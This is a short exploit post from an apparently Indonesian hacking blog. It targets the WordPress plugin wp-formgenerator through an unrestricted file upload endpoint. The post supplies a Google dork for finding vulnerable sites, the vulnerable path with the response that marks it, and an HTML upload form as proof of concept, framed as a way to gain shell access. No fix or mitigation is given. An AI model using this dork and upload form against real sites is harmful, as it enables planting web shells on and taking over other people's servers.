Wordpress Plugins Wp-formgenerator File Upload Vulnerabilities - 3xploi7 BuG

Wordpress Plugins Wp-formgenerator File Upload Vulnerabilities




#-Title: Wordpress Plugins Wp-formgenerator File Upload Vulnerabilities
#-Author: unknown
#-Date: 10/26/2015
#- Vendor : CodeCanyon
#- Link Download : codecanyon. net/item/form-generator-wordpress-form-builder/4613911
#-Google Dork: inurl:wp-content/plugins/wp-formgenerator
#- Tested on : Trusty Tahr
#- Fixed in ??
==========================================================================

Vulnerability : "/wp-content/plugins/wp-formgenerator/uploads/php"
 When Vulnerable {"files":[]}

Proof Of Concept :

Use CSRF :

<form method="POST" action="Zembut/wp-content/plugins/wp-formgenerator/uploads/php/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>

</form>


Shell Acces ? Here





Ada pertanyaan? Silahkan komentar

1 Komentar

Tambahkan komentar disini

Iklan Atas Artikel

3xploi7 1

3xploi7 2

Iklan Bawah Artikel

Lihat Juga :
Stay toon disini ya karena artikel akan selalu di update.
Kalau ada masalah silahkan gabung grup
Kunjungi Terus " 3xploi7 " untuk update menarik selanjutnya, Jangan sampai Terlewatkan.
• Join Grup Team :
— Facebook Grup ( 5.325 Anggota )
— Dapatkan informasi update terbaru : Disini